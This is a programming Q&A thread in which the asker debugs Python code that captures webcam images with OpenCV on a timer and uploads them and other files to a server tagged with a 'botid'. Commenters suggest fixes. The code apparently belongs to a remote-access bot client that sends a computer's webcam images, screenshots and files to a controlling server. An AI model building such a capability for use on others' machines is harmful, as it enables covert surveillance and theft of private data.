# Upload after OpenCV webcam capture failing

Tags: python, image, opencv, networking

Alright so I'm trying to make a webcam capturer with OpenCV that then sends the current image to my server. What's happening from what I can tell is it's creating the picture but when I run my upload command it's sending some kind of blank picture. If I go to view the latest picture after the program is terminated it's all there and good. Here's my code, any help would be greatly appreciated.

```
import os
import time
import threading
import cv2
from PIL import Image

import upload
import utils

streaming = False

def update_webcam():
    global streaming
    if streaming:
        threading.Timer(5.0, update_webcam).start()
    camera = cv2.VideoCapture(0)
    time.sleep(0.1)
    filepath = os.path.join(os.environ['temp'], "webcam.jpg")
    return_value, image = camera.read()
    cv2.imwrite(filepath, image)
    del (camera)
    upload.run(filepath)

def run(action):
    global streaming
    if action == "capture":
        update_webcam()
    if action == "start":
        streaming = True
        update_webcam()
    if action == "stop":
        streaming = False
```

Upload file:

```
import requests
import os
import shutil

import utils
import settings


def run(path):
    filename = os.path.basename(path)
    if os.path.isdir(path):
        arch_path = shutil.make_archive(filename, 'zip', path)
        requests.post(settings.SERVER_URL + "/api/upload", {'botid': settings.BOT_ID, 'src': os.path.basename(arch_path)}, files={'uploaded': open(arch_path, 'rb')})
        os.remove(arch_path)
    else:
        requests.post(settings.SERVER_URL + "/api/upload", {'botid': settings.BOT_ID, 'src': filename}, files={'uploaded': open(path, 'rb')})
```

Comment: Is the image which is saved blank ?  cv2.imwrite(filepath, image)

Comment: @Zed41 No the image is perfectly fine, what I think might be happening is by the time I upload the the thread has already started capturing a new one

Comment: I don't think that threading has anything to do here until your image is saved and you are accessing the image file :/

Comment: @Zed41 I have tested saving the picture then running my upload command separately and it worked... hm

Comment: anyways can you print the arch_path and check if it is valid

Comment: The arch_path only gets used if it's a folder I'm uploading

Comment: It's actually weird because I have another command called screenshot that does pretty much exactly what I'm doing here but instead of webcam it captures the screen and sends it.

Comment: One thing when you call threading.Timer() it calls the update_webcam() every 5 ms ? so it basically start creating a thread for each update_webcam() you call . . . can you call the thread in the run() instead of update_webcam()

Comment: So I moved the thread call to run() but it only runs it once and I still get the "Unexpected file: webcam.jpg" on my ubuntu server

Comment: It cant fetch the file in that location ? /temp/webcam.jpg ?

Comment: I don't think that there is any error in the main file . . i just changed the content of the upload.py to this http://codepad.org/hANNPWbG and it works like charm :/ so that means there is something going wrong in the upload.py